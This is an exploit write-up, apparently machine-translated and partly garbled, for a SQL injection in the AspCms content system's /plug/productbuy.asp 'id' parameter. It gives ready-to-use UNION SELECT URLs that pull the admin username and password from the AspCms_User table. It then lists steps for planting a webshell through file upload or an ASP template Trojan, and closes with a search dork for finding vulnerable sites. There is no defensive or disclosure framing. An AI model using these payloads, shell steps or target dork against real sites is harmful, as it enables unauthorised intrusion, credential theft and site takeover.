An open-source enterprise website construction system with a new kernel developed by aspcms is competent for multiple website construction requirements of enterprises, and supports template customization and extension plug-ins. It can complete enterprise website construction in a short time. Vulnerability file: plugproductbuy. asp does not filter the received parameter IDs, leading to webpage jumps after injection.
An open-source enterprise website construction system with a new kernel developed by aspcms, which is competent for multiple enterprise website construction requirements.
Supports customization of templates, extension plug-ins, and so on, allowing enterprises to build websites within a short period of time.
Vulnerability file:/plug/proDuCtbuy. asp
Receive ParametersIdInjection vulnerability caused by no filtering
The injected page is redirected, so it is fast. We recommend that you use the shortcut key to copy
Burst user name EXP:
http://www.tmdsb.com/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1 |
This is the account name with an explosive ID = 1. If you find that you have insufficient permissions, try the following steps: 2, 3, 4 ...........
Password cracking
http://www.tmdsb.com/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1 |
Background logon address:/admin/login. asp
Shell in the background
1. directly upload. asp; x
2. system configuration information
3. Create a template management. 1. Create an asp template and write the content of the Trojan.
Keywords: search keywords: intitle: PowerEdBy AspCms2